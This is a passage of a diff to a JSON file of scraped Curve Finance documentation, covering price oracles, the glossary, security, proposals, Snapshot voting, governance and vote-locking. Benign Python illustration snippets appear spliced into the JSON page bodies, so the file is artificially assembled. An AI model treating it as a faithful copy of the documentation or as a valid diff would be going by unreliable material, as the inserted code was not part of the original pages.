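def ema_price(price_oracle_prev, last_price, dt, ma_half_time):
    # One EMA step: after ma_half_time seconds the old oracle value's
    # weight decays to 1/2, so recent trades dominate as dt grows.
    alpha = math.pow(0.5, dt / ma_half_time)
    return last_price * (1 - alpha) + price_oracle_prev * alpha

# A trade at 105 nudges a 100 oracle only partway after 300s
# with a 600s half-life:
print(ema_price(100.0, 105.0, dt=300, ma_half_time=600))  # ~101.46
```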
For comparison, traders commonly rely on a simple moving average as a technical analysis indicator, which calculates the average of a certain number of points (i.e., a 200-day moving average computes the average of the trailing 200 days of data). The exponential moving average is similar, except it applies a weighting to emphasize newer data over older data. This weighting falls off exponentially as it looks further back in time, so it can react quicker to recent trends. Updates An internal function tweak_price is called every time prices might need to be updated by an operation which might adjust balances within a pool (hereafter referred to as a liquidity operation ): add_liquidity remove_liquidity_one_coin exchange exchange_underlying The tweak_price function is a gas-expensive function which can execute several state-changing operations on state variables. Price Oracle The price_oracle is updated only once per block. If the current timestamp is greater than the timestamp of the last update, then price_oracle is updated using the previous price_oracle value and data from last_prices . The updated price_oracle is then used to calculate the vector distance from the price_scale , which is used to determine the amount of adjustment required for the price_scale . Profits and Liquidity Balances Curve v2 pools operate on profits. That is, liquidity is rebalanced when the pool has earned sufficient profits to do so. Every time a liquidity operation occurs, the pool chooses whether it should spend profits on rebalancing. The pool's actions may be considered as an attempt to rebalance liquidity close to market prices. Pools perform all such operations strictly with profits, never with user funds. Profits are occasionally claimed by administrators, otherwise funds remain in the pool. In other words, profits can be calculated from the following function: profits == erc20.balanceOf(i) - pool.balances(i) Internally, every time the tweak_price function is called during a liquidity operation , the pool tracks profits. It then uses the updated profit values to consider if it should rebalance liquidity. Specifically, pools carry a public parameter called allowed_extra_profit which works like a buffer. If the pool's virtual price has grown by more than a function of profits and the allowed_extra_profit buffer value, then the pool is considered profitable enough to rebalance liquidity. From here, the pool further checks that the price_scale is sufficiently different from price_oracle , to avoid rebalancing liquidity when prices are pegged. Finally, the pool computes the updates to the price_scale and how this affects other pool parameters. If profits still allow, then the liquidity is rebalanced and prices are adjusted. Manipulation We do not recommend using Curve pools by themselves as canonical price oracles. It is possible, particularly with low liquidity pools, for outside users to manipulate the price. Curve pools nonetheless include protections against some forms of manipulation. The logic of the Curve price_oracle variable only updates once per block, which makes it more resistant to manipulation from malicious trading activity within a single block. Because changes to price_oracle are dampened by an exponential moving average , attempts to manipulate the price may succeed but would require a prolonged attack over several blocks. Actual $CVX price versus CVX-ETH Pool Price Oracle and Price Scale during rapid volatility These safeguards all help to prevent various forms of manipulation.
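The profit identity quoted above can be read off-chain; here is a hypothetical web3.py sketch, assuming `token` and `pool` are already-constructed Contract instances for coin i and the v2 pool:

```python
from web3.contract import Contract

def pool_profit(token: Contract, pool: Contract, i: int) -> int:
    # Off-chain reading of the identity quoted above: idle profit for
    # coin i is the ERC-20 balance the pool actually holds minus the
    # balance the pool tracks internally via its balances(uint256) getter.
    held = token.functions.balanceOf(pool.address).call()
    tracked = pool.functions.balances(i).call()
    return held - tracked
```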
However, for pools with low liquidity, it is not difficult for whales to manipulate the price over the course of several transactions. When relying on oracles on-chain, it is safest to compare results among several oracles and revert if any is behaving unusually. v1 Pools Newer v1 Pools also contain a price oracle function, which also displays a moving average of recent prices. If the moving average price was written to the contract in the same block it will return this value, otherwise it will calculate on the fly any changes to the moving average since it was last written. Curve v1 pools do not have a concept of price scale, so no endpoint exists for retrieving this value. Older v1 pools will also not have a price oracle, so use caution if you are attempting to retrieve this value on-chain. LLAMMA LLAMMA's use of oracles is quite different from that of Curve v2 pools in that it can utilize external price oracles. In LLAMMA, the price_oracle function refers to the collateral price (which can be thought of as the current market price) as determined by an external contract. For example, LLAMMA uses price_oracle to convert $ETH to $crvUSD at a specific collateral price. When the external price is higher than the upper price (internally: P_UP ), all assets in the band range are converted to $ETH. When the price is lower than the lower price (internally: P_DOWN ), all assets are converted to $crvUSD. When the oracle price is in the middle, the current band is partially converted, with the exact proportion determined by price changes. When the external price changes, an arbitrage opportunity exists. External arbitrageurs can deposit $ETH or $crvUSD to balance the pool, until the pool price reaches parity with the external price. LLAMMA applies an exponential moving average to the price_oracle to prevent users from absorbing losses due to drastic fluctuations. More information on price oracles and other LLAMMA dynamics is available in this article .
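To summarize the band behavior just described, a toy sketch; the linear blend inside the band is an illustrative simplification, not LLAMMA's actual AMM math:

```python
def band_collateral_fraction(p_oracle: float, p_down: float, p_up: float) -> float:
    # Above P_UP the band holds only the collateral asset (e.g. ETH);
    # below P_DOWN it has been fully converted to crvUSD; in between,
    # the band holds a mix. A linear blend stands in for the real curve.
    if p_oracle >= p_up:
        return 1.0
    if p_oracle <= p_down:
        return 0.0
    return (p_oracle - p_down) / (p_up - p_down)

print(band_collateral_fraction(1850.0, p_down=1800.0, p_up=1900.0))  # 0.5
```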
2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -1970,7 +1970,15 @@ { "title": "Glossary", "html_url": "https://resources.curve.fi/faq/glossary/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Glossary Table of contents Glossary 3CRV Admin fee Boosting (also boosties) CRV DeFi (Decentralized Finance) Metamask Metapool Llamas LP (Liquidity provider) LP tokens (Liquidity provider token) Yearn yCRV yUSD (also yyCRV) Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Glossary 3CRV Admin fee Boosting (also boosties) CRV DeFi (Decentralized Finance) Metamask Metapool Llamas LP (Liquidity provider) LP tokens (Liquidity provider token) Yearn yCRV yUSD (also yyCRV) Glossary Glossary 3CRV 3CRV is the LP token for the 3Pool (sometimes referred to as TriPool). Trading fees are distributed in 3CRV. Admin fee Admin fee is the share of trading fees that are received by governance participants who have locked their CRV (see veCRV). Boosting (also boosties) The act of locking your CRV to earn more CRV on your provided liquidity. Boosting your CRV Rewards CRV Governance and utility token for the Curve DAO. DeFi (Decentralized Finance) Decentralized finance (commonly referred to as DeFi) is an experimental form of finance that does not rely on financial intermediaries such as brokerages, exchanges, or banks, and instead utilizes blockchains, most commonly the Ethereum blockchain. Metamask Metamask is an Ethereum wallet that allows you to interact with Curve and other dapps. You can also use it with Ledger and Trezor hardware wallets. It's the most popular Ethereum web wallet and is available as an add-on for most browsers. Metapool Metapools are a type of pool on Curve composed of one asset as well as as LP tokens from another pool. Base & MetaPools Llamas Llamas are wonderful and magical creatures. Each Curve team member must own at least one llama as part of their contract with Curve Finance. LP (Liquidity provider) Users providing liquidity (funds/assets) on the Curve or other DeFi protocols. LP tokens (Liquidity provider token) When you deposit into a Curve pool, you receive a counter party token which represents your share of the pool. veCRV Stands for vote-escrowed CRV. 
They are CRV locked for the purpose of voting and earning fees. Understanding $CRV Yearn Yearn Protocol is a set of Ethereum Smart Contracts focused on creating a simple way to generate high risk-adjusted returns for depositors of various assets via best-in-class lending protocols, liquidity pools, and community-made yield farming strategies on Ethereum. It was founded by Andre Cronje who has been a long term collaborator of Curve Finance. yCRV yCRV is not wrapped CRV, it's a wrapped representation of ownership of yUSDC+yUSDT+yDAI+yTUSD deposits in the Curve Y pool (i.e. your share of the pool). Each pool on Curve has an LP token with a different name. yUSD (also yyCRV) Yearn token wrapper that represents shares of the Y pool inside the Yearn Y Pool vault. It is a wrapped version of yCRV. Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Glossary Table of contents 3CRV Admin fee Boosting (also boosties) CRV DeFi (Decentralized Finance) Metamask Metapool Llamas LP (Liquidity provider) LP tokens (Liquidity provider token) Yearn yCRV yUSD (also yyCRV) Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents 3CRV Admin fee Boosting (also boosties) CRV DeFi (Decentralized Finance) Metamask Metapool Llamas LP (Liquidity provider) LP tokens (Liquidity provider token) Yearn yCRV yUSD (also yyCRV) Home Appendix Glossary 3CRV 3CRV is the LP token for the 3Pool (sometimes referred to as TriPool). Trading fees are distributed in 3CRV. Admin fee Admin fee is the share of trading fees that are received by governance participants who have locked their CRV (see veCRV). Boosting (also boosties) The act of locking your CRV to earn more CRV on your provided liquidity. Boosting your CRV Rewards CRV Governance and utility token for the Curve DAO. DeFi (Decentralized Finance) Decentralized finance (commonly referred to as DeFi) is an experimental form of finance that does not rely on financial intermediaries such as brokerages, exchanges, or banks, and instead utilizes blockchains, most commonly the Ethereum blockchain. Metamask Metamask is an Ethereum wallet that allows you to interact with Curve and other dapps.
You can also use it with Ledger and Trezor hardware wallets. It's the most popular Ethereum web wallet and is available as an add-on for most browsers. Metapool Metapools are a type of pool on Curve composed of one asset as well as LP tokens from another pool. Base & MetaPools Llamas Llamas are wonderful and magical creatures. Each Curve team member must own at least one llama as part of their contract with Curve Finance. LP (Liquidity provider) Users providing liquidity (funds/assets) on the Curve or other DeFi protocols. LP tokens (Liquidity provider token) When you deposit into a Curve pool, you receive a counterparty token which represents your share of the pool. veCRV Stands for vote-escrowed CRV. They are CRV locked for the purpose of voting and earning fees. Understanding $CRV Yearn Yearn Protocol is a set of Ethereum Smart Contracts focused on creating a simple way to generate high risk-adjusted returns for depositors of various assets via best-in-class lending protocols, liquidity pools, and community-made yield farming strategies on Ethereum. It was founded by Andre Cronje, who has been a long-term collaborator of Curve Finance. yCRV yCRV is not wrapped CRV, it's a wrapped representation of ownership of yUSDC+yUSDT+yDAI+yTUSD deposits in the Curve Y pool (i.e. your share of the pool). Each pool on Curve has an LP token with a different name. yUSD (also yyCRV) Yearn token wrapper that represents shares of the Y pool inside the Yearn Y Pool vault. It is a wrapped version of yCRV. 2023-09-28 Back to top", + "labels": [ + "Documentation" + ] + }, + { + "title": "Security", + "html_url": "https://resources.curve.fi/faq/security/", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Security Table of contents Audits Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Audits Home Appendix Security Curve Finance emphasizes its commitment to security by regularly undergoing audits from reputable third-party firms. These audits aim to uncover potential vulnerabilities and ensure that the protocol's smart contracts function as intended. However, as with all DeFi platforms, users should be aware that engaging with Curve Finance carries inherent risks. 
Despite the thoroughness of audits, they do not guarantee complete security, and potential vulnerabilities might still emerge in the future. Therefore, individuals should always proceed with caution and understand that the use of the protocol is at their own risk. Audits For a detailed look into the audits Curve Finance has undergone, please refer here. 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -1978,7 +1986,7 @@ { "title": "Proposals", "html_url": "https://resources.curve.fi/governance/proposals/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Proposals Table of contents Proposals Creating a proposal Type of votes Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Proposals Creating a proposal Type of votes Proposals Proposals Once CRV holders vote-lock their veCRV, they can start voting on various proposals. Creating a proposal Anybody can create proposals but users need to follow the structure of a proposal which can be found by creating a new topic on the governance forum: https://gov.curve.fi/ Users who create proposals also need to create a corresponding CIP proposal at http://signal.curve.fi/ Using the signalling tool is completely free (no transaction fees) and you only need 1veCRV to create a proposal there. Assuming you have at least 2,500 veCRV, you can also create an official DAO vote as long as it also comes with its topic presenting it on the governance forum. 
Voting Type of votes Currently there are two type of votes: Signalling votes which are non-official votes only used to gauge interest from community ( https://signal.curve.fi/#/ ) Official DAO votes are the only way to enact changes on the Curve protocol ( https://dao.curve.fi/ ) Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Proposals Table of contents Creating a proposal Type of votes Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Creating a proposal Type of votes Home Governance Proposals Proposals Once CRV holders vote-lock their veCRV, they can start voting on various proposals. Creating a proposal Anybody can create proposals, but users need to follow the structure of a proposal, which can be found by creating a new topic on the governance forum: https://gov.curve.fi/ Users who create proposals also need to create a corresponding CIP proposal at http://signal.curve.fi/ Using the signalling tool is completely free (no transaction fees) and you only need 1 veCRV to create a proposal there. Assuming you have at least 2,500 veCRV, you can also create an official DAO vote as long as it also comes with a topic presenting it on the governance forum. 
Voting Type of votes Currently there are two types of votes: Signalling votes, which are non-official votes only used to gauge interest from the community ( https://signal.curve.fi/#/ ) Official DAO votes are the only way to enact changes on the Curve protocol ( https://dao.curve.fi/ ) 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -1986,7 +1994,7 @@ { "title": "Snapshot", "html_url": "https://resources.curve.fi/governance/snapshot/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Snapshot Table of contents Snapshot Voting Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Snapshot Voting Snapshot Snapshot is a signalling tool that allows governance participants to signal for free. As gas fees are here to stay on the Ethereum blockchain, Curve governance is now using a tool called Snapshot to allow governance users to signal their preferences on Curve proposals. Whilst this tool doesn't replace governance and will only be used to signal, it's a great way for holders of all sizes to make their voices heard as voting is completely free. Voting Head over to the signalling tool: https://signal.curve.fi/#/curve and connect your Metamask wallet. It should be the one where you hold your veCRV (vote locked CRV). Simply review your proposal, select your preferred option and click Vote: You will be prompted by Metamask to sign a transaction which is completely free and your voting vote will be counted according to your voting weight at the moment of the proposal creation. 
Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Snapshot Table of contents Voting Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Voting Home Governance Snapshot Snapshot is a signalling tool that allows governance participants to signal for free. As gas fees are here to stay on the Ethereum blockchain, Curve governance is now using a tool called Snapshot to allow governance users to signal their preferences on Curve proposals. Whilst this tool doesn't replace governance and will only be used to signal, it's a great way for holders of all sizes to make their voices heard as voting is completely free. Voting Head over to the signalling tool: https://signal.curve.fi/#/curve and connect your Metamask wallet. It should be the one where you hold your veCRV (vote locked CRV). Simply review your proposal, select your preferred option and click Vote: You will be prompted by Metamask to sign a message, which is completely free, and your vote will be counted according to your voting weight at the moment of the proposal creation. 
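The reason signing is free: a Snapshot vote is an off-chain signed message, not an on-chain transaction. Below is a minimal Python sketch of that idea using the eth-account library; the vote payload and proposal id are hypothetical placeholders, not Snapshot's actual schema.

```python
# Sketch: a Snapshot-style vote is just a signed message -- no gas needed.
from eth_account import Account
from eth_account.messages import encode_defunct

acct = Account.create()  # stand-in for the wallet holding your veCRV
vote = '{"proposal": "example-proposal-id", "choice": 1}'  # hypothetical payload

# Signing happens locally and costs nothing; only the signature is submitted.
signed = Account.sign_message(encode_defunct(text=vote), private_key=acct.key)
print(signed.signature.hex())
```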
2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -1994,15 +2002,15 @@ { "title": "Understanding governance", "html_url": "https://resources.curve.fi/governance/understanding-governance/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Understanding governance Table of contents Understanding Governance Voting on the Curve DAO Voting Power The DAO Dashboard Submitting proposals Emergency DAO Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Understanding Governance Voting on the Curve DAO Voting Power The DAO Dashboard Submitting proposals Emergency DAO Understanding governance Understanding Governance Voting on the Curve DAO To vote on the Curve DAO, users need to lock vote lock their CRV. By doing so, participants can earn a boost on their provided liquidity and vote on all DAO proposals. Users who reach a voting power of 2500 veCRV can also create new proposals. There is no minimum voting power required to vote. Voting Power veCRV stands for vote escrowed CRV, it's a locker where users can lock their CRV for different lengths of time to gain voting power. Users can lock their CRV for a minimum of week and a maximum of four years. As users with long voting escrow have more stake, they receive more voting power. The DAO Dashboard You can visit the Curve DAO dashboard at this address: https://dao.curve.fi/dao On this page, you can find all current and closed votes. All proposals should have a topic on the Curve governance forum at this address: https://gov.curve.fi/ Submitting proposals If you wish to create a new official proposal, you should draft a proposal and post it on the governance forum. You must also research that it's possible and gauge interest of the community via the Curve Discord, Telegram or Governance forum. If you're not sure about the technical details of submitting your proposal to the Ethereum blockchain, you can ask a member of the team to help. Emergency DAO The emergency DAO multisig may kill non-factory pools up to 2 months old. It may also kill reward gauges at any time, setting its rate of CRV emissions to 0. Pools that have been killed will only allow users to remove_liquidity . 
See the members of the emergency DAO in the technical docs: https://docs.curve.fi/curve_dao/ownership-proxy/Agents/#agents The Curve DAO may override the emergency DAO decision of killing a pool, making it alive again. Last update: 2023-09-12 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Understanding governance Table of contents Voting on the Curve DAO Voting Power The DAO Dashboard Submitting proposals Emergency DAO Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Voting on the Curve DAO Voting Power The DAO Dashboard Submitting proposals Emergency DAO Home Governance Understanding governance Voting on the Curve DAO To vote on the Curve DAO, users need to vote-lock their CRV. By doing so, participants can earn a boost on their provided liquidity and vote on all DAO proposals. Users who reach a voting power of 2500 veCRV can also create new proposals. There is no minimum voting power required to vote. Voting Power veCRV stands for vote-escrowed CRV; it's a locker where users can lock their CRV for different lengths of time to gain voting power. Users can lock their CRV for a minimum of one week and a maximum of four years. As users with long voting escrow have more stake, they receive more voting power. The DAO Dashboard You can visit the Curve DAO dashboard at this address: https://dao.curve.fi/dao On this page, you can find all current and closed votes. All proposals should have a topic on the Curve governance forum at this address: https://gov.curve.fi/ Submitting proposals If you wish to create a new official proposal, you should draft a proposal and post it on the governance forum. You must also research whether it's possible and gauge the interest of the community via the Curve Discord, Telegram or Governance forum. If you're not sure about the technical details of submitting your proposal to the Ethereum blockchain, you can ask a member of the team to help. Emergency DAO The emergency DAO multisig may kill non-factory pools up to 2 months old. It may also kill reward gauges at any time, setting their rate of CRV emissions to 0. Pools that have been killed will only allow users to remove_liquidity. 
See the members of the emergency DAO in the technical docs: https://docs.curve.fi/curve_dao/ownership-proxy/Agents/#agents The Curve DAO may override the emergency DAO's decision to kill a pool, making it live again. 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Vote locking boost", + "title": "Vote-locking FAQ", "html_url": "https://resources.curve.fi/governance/vote-locking-boost/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Vote locking boost Table of contents Vote Locking What is vote locking? What is the vote locking boost? When does the boost start? What are veCRV? How is your boost calculated? What if I provide liquidity in multiple pools? What happens if more people vote lock? How often does my boost records voting power changes? How can I apply my boost? How to know my boost is active? Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Vote Locking What is vote locking? What is the vote locking boost? When does the boost start? What are veCRV? How is your boost calculated? What if I provide liquidity in multiple pools? What happens if more people vote lock? How often does my boost records voting power changes? How can I apply my boost? How to know my boost is active? Vote locking boost Vote Locking Answering all your burning questions about the vote locking boost What is vote locking? CRV holders can vote lock their CRV into the Curve DAO to receive veCRV. The longer they lock for, the more veCRV they receive. Vote locking allows you to vote in governance, boost your CRV rewards and receive trading fees. What is the vote locking boost? When vote locking CRV, you will also earn a boost on your provided liquidity of up to 2.5x. The goal is to incentivise users to participate in governance by rewarding them with a bigger share of the daily CRV inflation. When does the boost start? The boost will start on the 26 th of August 2020 around 11pm UTC. What are veCRV? veCRV stands for voting escrow CRV. They are your CRV locked for voting. The longer you lock your CRV for, the more voting power you have (and the bigger boost you can reach). You can vote lock 1,000 CRV for a year to have a 250 veCRV weight. Each CRV locked for four years is equal to 1 veCRV. 
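The locking arithmetic stated here is linear and easy to reproduce: 1 CRV locked for four years equals 1 veCRV, shorter locks scale down proportionally, and the weight decays to zero at expiry. Below is a small Python sketch of the rule as stated; it is an editorial illustration only, not the on-chain VotingEscrow contract, which additionally rounds lock ends down to whole weeks.

```python
from datetime import datetime

MAX_LOCK_YEARS = 4.0  # 1 CRV locked for four years equals 1 veCRV

def initial_vecrv(crv_amount: float, lock_years: float) -> float:
    """veCRV weight at lock time, proportional to the lock length."""
    return crv_amount * min(lock_years, MAX_LOCK_YEARS) / MAX_LOCK_YEARS

def vecrv_weight(crv_amount: float, unlock: datetime, now: datetime) -> float:
    """Current weight: decays linearly to zero as the lock expiry approaches."""
    years_left = max((unlock - now).total_seconds(), 0.0) / (365 * 24 * 3600)
    return crv_amount * min(years_left, MAX_LOCK_YEARS) / MAX_LOCK_YEARS

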